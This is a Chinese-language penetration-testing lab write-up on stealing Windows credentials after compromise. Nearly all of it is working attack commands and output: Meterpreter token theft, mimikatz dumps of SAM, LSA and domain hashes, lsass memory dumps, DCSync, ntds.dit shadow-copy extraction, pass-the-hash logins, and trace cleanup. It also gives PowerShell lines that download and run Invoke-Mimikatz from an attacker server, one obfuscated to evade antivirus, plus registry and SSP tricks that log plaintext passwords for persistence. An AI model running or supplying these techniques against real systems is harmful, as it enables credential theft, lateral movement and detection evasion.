导出Hash以及查看明文密码的几种方法
实验环境:kali,win10,win server 2012 R2
假设已经获取win10主机权限,记录一些方法获取主机的用户hash以创造突破
windows中令牌窃取只有特权用户才能进行,即要求用户必须拥有SeImpersionatePrivilege和SeAssignPrimaryTokenPrivilege/SeIncreaseQuotaPrivilege特权,获得主机权限后,可以通过whoami /priv查看用户具备的权限
主机hash
MSF
smart_hashdump
MSF内置模块:post/windows/gather/smart_hashdump,注意前置条件:system权限
hashdump
值得注意的事,如果getsystem之后仍然无法获得hash,尝试migrate到一个拥有system权限的进程上再执行hashdump
ps查看目标主机进程
migrate进行迁移
incognito
题外话,通过incognito模块窃取系统管理员令牌然后执行其他hash导出操作
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u //列出可用令牌
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
DESKTOP-3U0MUK9\chen
NT AUTHORITY\IUSR
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
NT AUTHORITY\ANONYMOUS LOGON
NT AUTHORITY\NETWORK SERVICE
Window Manager\DWM-1
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > steal_token 8720 //ps查看system进程
Stolen token with username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 4976 created.
Channel 1 created.
Microsoft Windows [�汾 10.0.19042.1706]
(c) Microsoft Corporation����������Ȩ����
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>mimikatz
借助mimikatz工具,直接或间接的得到目标hash
内置
pwd查看当前路径,upload上传mimikatz.exe
进入路径执行命令,找到mimikatz.exe
若当前权限为非管理员,需执行以下命令提升权限
若拥有了管理员权限,只需执行sekurlsa::logonpasswords full或lsadump::sam命令即可
还可以通过reg的save选项将注册表中的SAM,System文件导出到本地,而后离线导出
C:\Users\chen\Desktop>reg save hklm\sam sam.hive
reg save hklm\sam sam.hive
The operation completed successfully.
C:\Users\chen\Desktop>reg save hklm\system system.hive
reg save hklm\system system.hive
The operation completed successfully.
C:\Users\chen\Desktop>mimikatz.exe
mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # lsadump::sam /sam:sam.hive /system:system.hive
Domain : DESKTOP-3U0MUK9
SysKey : d12d3127527d07224c3c4b97ca581262
Local SID : S-1-5-21-2691107070-1375161855-337516022
SAMKey : a9248f1b904d324a1efa1d3e622fbb1a
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 9db5b04bca62e7fc1930392b2fe75014
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : afc9f9d944f1000fb8e91aa6c0eb9936
* Primary:Kerberos-Newer-Keys *
Default Salt : DESKTOP-3U0MUK9WDAGUtilityAccount
Default Iterations : 4096
Credentials
aes256_hmac (4096) : fa2e99e95122dd2c083ef2e8ccf4d859f750e03652a939ce8490a91ebc954a5b
aes128_hmac (4096) : 96ab0404767d84872ec1d26835ed7a57
des_cbc_md5 (4096) : 23d3b3e00d1358e5
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : DESKTOP-3U0MUK9WDAGUtilityAccount
Credentials
des_cbc_md5 : 23d3b3e00d1358e5
RID : 000003e9 (1001)
User : chen
Hash NTLM: 32ed87bdb5fdc5e9cba88547376818d4
票据导出
将票据导出
kerberos::list /export
可利用Hashcat等爆破
第三方工具
Procdump
procdump是微软官方提供的工具,因此一般处于检测白名单之内。官网下载地址:https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
上传procdump.exe到目标主机,执行如下命令
procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp
下载到本地,mimikatz读取
SQLDumper
同样具有微软的签名(360、卡巴斯基无法抓取)
tasklist /svc | findstr "lsass.exe"
SqlDumper.exe pid 0 0x01100powershell
本地
powershell -nop -exec bypass Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'
powershell -nop -exec bypass Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'远程(可配合其他框架如nishang、empire、powerspliot)
powershell -nop -exec bypass -c "iex(New-Object Net.webclient).downloadstring('http://vps-ip:port/InvokeMimikatz.ps1');Invoke-Mimikatz –DumpCred混淆
powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'x.xx.xxx'+'.xx:xxxx/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvokeMimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"域hash
此处环境为windows server 2012 R2
MSF
首先当然是最直接的hashdump
另外有个专门的模块
use post/windows/gather/credentials/domain_hashdump(失败)不知道为啥导不出ntds
成功应该是这样
mimikatz
lsadump::dcsync /domain:pentestlab.local /all /csv
指定用户查询,记得加$,如果不确定用户名,执行net group "domain computers" /domain查看
lsadump::dcsync /domain:aim.com /user:jack$
利用lsass.exe
privilege::debug
lsadump::lsa /inject
DCSync
powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.232.128:3122/Invoke-DCSync.ps1')";Invoke-DCSync -PWDumpFormat > hash.txtmsf内加载powershell模块(为啥报错捏,俺也不知道)
或加上参数-PWDumpFormat
ntdsutil
依次执行如下命令
ntdsutil.exe snapshot "activate instance ntds" create q q
复制GUID,执行
ntdsutil.exe snapshot "mount {f558e268-3e8d-49f0-9421-b322b38cf0c5}" q q
复制目录路径,执行
copy 'C:\$SNAP_202211221302_VOLUMEC$\Windows\NTDS\ntds.dit' C:\Users\admin\ntds.dit
之后就可以进行离线破解
清除痕迹:
ntdsutil.exe snapshot "List All" q q
ntdsutil.exe snapshot "umount {167c0406-0f3f-434e-93a6-52e77c8cd4c9}" "delete {167c0406-0f3f-434e-93a6-52e77c8cd4c9}" q q有几组卸几组
vshadow
复制ntds.dit、sam或者system文件
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\system.hiv
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\sam.hiv执行完毕后会在C盘根目录生辰一个ShadowCopy文件以及sam.hiv
download出来利用impacket中的secretsdump.py破解,system.hiv是必须的,它包含了解密NTDS文件内容所需的密钥
impacket-secretsdump -ntds ShadowCopy -system system.hiv LOCAL
获取hash之后就可以利用wmic之类的进行登录了
impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:b3eefb3c06e2ce5b98066f3c1f00e730 aim.com/administrator@192.168.232.135 -codec gbk
Vshadow + ShadowCopy + QuarksPwDum
上传vshadow.exe,exp.bat到同一目录下,这有个坑,一开始用了32位的vshadow.exe失败了很多次,换了64位
exp.bat
setlocal
if NOT "%CALLBACK_SCRIPT%"=="" goto :IS_CALLBACK
set SOURCE_DRIVE_LETTER=%SystemDrive%
set SOURCE_RELATIVE_PATH=\windows\ntds\ntds.dit
set DESTINATION_PATH=%~dp0
@echo ...Determine the scripts to be executed/generated...
set CALLBACK_SCRIPT=%~dpnx0
set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd
@echo ...Creating the shadow copy...
"%~dp0vshadow.exe" -script=%TEMP_GENERATED_SCRIPT% -exec="%CALLBACK_SCRIPT%" %SOURCE_DRIVE_LETTER%
del /f %TEMP_GENERATED_SCRIPT%
@goto :EOF
:IS_CALLBACK
setlocal
@echo ...Obtaining the shadow copy device name...
call %TEMP_GENERATED_SCRIPT%
@echo ...Copying from the shadow copy to the destination path...
copy "%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%" %DESTINATION_PATH%执行bat
win server 2012 R2能用的64位vshadow:
https://www.exefiles.com/zh-cn/exe/vshadow-exe/
修复复制出来的数据库
esentutl /p /o ntds.dit1
配合system.hive,QuarksPwDump读取信息导出结果,可以离线,当然也可以把QPD传上去
QuarksPwDump.exe --dump-hash-domain --with-history --ntds-file c:\ntds.dit --system-file c:\system.hive -o c:\res.txt 一定要注意这里要给绝对路径,选项参数之间只能有一个空格
获取明文密码
一些方法可以用作权限维持
实验环境:kali,windows server 2012 R2
修改注册表
修改成记录明文密码,实际是windows开启Wdigest Auth
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f命令使得用户锁屏,在windows server 2012下,rundll32.exe位于C://windows/SysWOW64
rundll32.exe user32.dll,LockWorkStation或者等待下一次用户自行锁屏重新输入密码登录
上传mimikatz.exe,即可看到wdigest中记录的明文密码
恢复修改不记录明文密码
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f强制锁屏还可使用powershell脚本
powershell -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/kiraly15/Lock-WorkStation/master/Lock-WorkStation.ps1');"其内容如下:
Function Lock-WorkStation
{
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStationps:题外话
powershell降级
-version 2mimikatz_ssp记录密码
上传mimikatz.exe,执行如下命令
privilege::debug
misc::memssp
锁屏重新登录,system32目录下会生成一个mimilsa.log
或者使用Invoke-Mimikatz.ps1
Import-Module .\Invoke-Mimikatz.ps1 //导入命令
Invoke-Mimikatz -Command "misc::memssp" //不需要重启获取 记录的明文密码存储在这个路径下mimilib.dll+修改注册表
mimikatz仓库下存在文件mimilib.dll,上传该文件至lsass.exe同目录即c:\windows\system32下,mimilib.dll存在32位和64位两个版本,根据系统位数上传
修改注册表
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "Security Packages" /t REG_MULTI_SZ /d mimilib.dll /f
等待目标重启系统,再查看目录下出现了一个kiwissp.log
并且文件会随时记录你登录锁屏的密码
Hook PasswordChangeNotify
https://github.com/Al1ex/Hook-PasswordChangeNotify
CVE-2021-36934
HiveNightmare: https://github.com/GossiTheDog/HiveNightmare